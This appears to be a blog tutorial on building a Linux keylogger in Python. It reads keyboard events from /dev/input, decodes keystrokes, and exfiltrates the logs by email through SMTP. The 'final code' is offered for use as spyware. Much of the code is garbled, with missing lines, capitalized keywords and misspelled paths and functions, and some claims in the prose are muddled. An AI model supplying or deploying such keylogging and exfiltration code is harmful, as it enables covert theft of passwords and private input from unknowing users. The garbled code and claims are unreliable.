Using Python Make A Keylogger In Linux!

In this era of technology, it is needless to say that one out of every 5 people is an easy target for malware attack. One of them is a keylogger. These malware attacks are potentially deadly as they tend to control various sections of a system of the target. Hackers or intruders use this software to breach into your personal data. That includes the username and the passwords you use to log into your social media account or other sites. 

If you want to make your virtual environment safer and secured then find out how to make a  keylogger for linux below!

What Exactly Is A Keylogger?

Keyloggers are known to function on the system of a person who’s a target. This means that the operation is predetermined by the intruder and it is not random. The program is built in such a way that it lets you access the network usage of the person that is the target. 

For example, business or families, using a keylogger could possibly keep a track of all the activities that their children or the entire business firm does.

Microsoft has mentioned that the Windows 10 operating system consists of an inbuilt function of keyloggers. But, here’s the drawback of it. Intruders have the ability to get a duplicate of the keylogger. With the help of this keylogger, intruders can use the keystrokes to their disadvantage. 

How To Make A Keylogger Using Python In Linux?

In this section, you will find relevant contents on how to make a keylogger for linux. The reason why Linux is more preferrable for making a keylogger is that for every keyboard, the input is not the same. Hence take a look at how to make a  keylogger for linux using python.

Everything is all about the file in the Linux machine. The first you need to do is visit the “dev/input” as because this folder holds relative contents and functions if keyboard as ell as the mouse. 

If you use the “ls-la” command, you will be able to retrieve data that is in this particular folder. This way you can get to know what all contents are there in the folder. 

Now the problem that would arise is that you will be confused. There are many files within the folder. How to be precise about it? Since the main goal is to record the pattern of keystroking, it is suggestive that whatever is not an “eventX” shall be removed. Even then, the contents are quite a lot, by a long margin. 

In that case, what you need to do is, go to “/proc/bus/input/devices:” this specific command tells you about the devices that are currently connected to the system. Doing so, you will be able to get the keyboard as a result.

How To Know Whether It’s The Right Keyboard Or Not?

To get the accuracy right, all you need to do is follow the command “B:EV=*”. This command tells you about the list of all the events that have been sent. 

Keep in mind that no matter what kind of a system you are using, for keyboard events, the value will always be EV=120013.

Implementation Of keylogger In Linux Using Python

Now that you have an idea of the event, you can proceed to find the keyboard in the following way:

Get The Keyboard 

In this section, you will find codes and commands that you can implement:

With open(“/proc/bus/input/devices”) as f:



handlers=list(filter(, lines))


For idx, elt in enumerate(handlers):





If you are confused about the lines then don’t worry. Finding the “Handlers” is for finding the event ID. Whereas, EV lines are meant to find event types that are available in the system. 

This code will run and look for the event EC-120013 after this. In results, you may not find anything that intriguing? Why? Because the result will look something like this!


It does look simple and empty. Well, it isn’t. Here, “Event6” holds the functions of the keyboard. 

Reading The Even*

Keep in mind that each time when a character is pressed on the keyboard, the eventX will not take them as characters. The input would rather be a data structure. Here’s the details of these data structures. 


This defines the date on which the event first came into light. 

Even Code

Even Code defines a detailed aspect of the vent such as its code or type.


As per the name, value defines a corresponding number of the entered key.

To get a better idea, follow the code below. 



in_file=open(infile_path, rb”)


While  event:


If code !=0 and type ==1 and value ==1:

If code in qwerty_,ap

If len(typed) ==123:

With open(“out.txt”,”a”) as f:



Now, let us understand what is happening in the above code. The “FORMAT” is to help Python understand how to and what to read, as well as how to sort. The “11HHI” stands for long and short integers. 

Part 1:

Now all you need to do is divide all the variables by first unpacking the stream. Keep in mind that the two long integers in the start are there to keep the date. This will not be in use. But the two short integers define the types and the entire code which will be used. The integer that is at the end will return a value which is important. 

Part 2:

Now you need to check whether there is any difference in the code. If it is not “0” then it implies that there has been an event with a value of “1”. After that, you need to make the value a character by converting it. 

In order to convert, you need to define any array having their respective values as well as characters. 

How To Acquire The Data?

You may be wondering how to get data information and store it. Here’s how:

Mail Option

The most feasible option that Python is familiar with, is by using the mailing option. Follow the commands below.

Def sendEmail:





msg[‘Subject’]=”Log clavier”

msg.attach(MIMEText(message, ‘plain’))


If USE_TLS is True:


server.login(msg[‘From’], password)



In this above-mentioned code, all that you are doing is simply creating a server for the mail. Then, after filling up the mail information, all you will be doing is connecting the server called SMTP. 

The Final Code

Now that you have a clear idea, check out the final code to implement:

#!/usr/bin/env python4

# -*-coding:Latin-1 -*

Import sys

Import re

Import struct

From email.mime.multipart import MIMEMultipart

From email.mime.text import MIMEText

Import smtplib

Qwerty_map = {

2: “1”, 3: “2”, 4: “3”, 5: “4”, 6: “5”, 7: “6”, 8: “7”, 9: “8” 11: “0”, 12: “-”, 13: “-”, 14: “[BACKSPACE]”, 15: “[TAB]”, 16: 18: “e”, 19: “r”, 20: “t”, 21: “y”, 22: “u”, 23: “i”, 24: “o”, 27: “$”, 28: “\n”, 29: “[CTRL]”, 30: “q”, 31: “s”, 32: “d”, 33: 35: “h”, 36: “j”, 37: “k”, 38: “l”, 39: “m”, 40: “u”, 41: “*”, 43: “<”, 44: “w”, 45: “x”, 46: “c”, 47: “v”, 48: “b”, 49: “n”, 51: “;”, 52: “;”, 53: “!”, 54: “[SHIFT]”, 55: “FN”, 56: “ALT”, }







Def sendEmail:





msg[‘Subject’]=”Log clavier”

msg.attach(MIMEText(message, ‘plain’))


If USE_TLS is True:


server.login(msg[‘From’], password)

server.sendmai(msg[‘From’], msg[‘To’], msg.as_string())


Def main():

With open(“/proc/bus/input/dvices”) as f:

Lines =f.readlines()


Handlers=list (filter)(, lines))


For idx, elt in enumerate(handlers):







in_file=open(infile_path, “rb”)


While event:

(_,_, type, code, value)=struct.unpack(FORMAT, event)

If code !=0 and type ==1 and value ==1:

If code in qwert_map:


If len(typed)>BUF_SIZE:





Def usage():

print(“Usage: ./keylogger [your email] [your password] [smtp:]

Def init_arg():

If en(sys.argv)<5:



Global EMAIL

Global USE_TLS


Global PASS



If sys.argv[4] is “tls”:








After you’re done creating these parameters, m=save the file as “” and then execute it!

Leave a Reply

Your email address will not be published. Required fields are marked *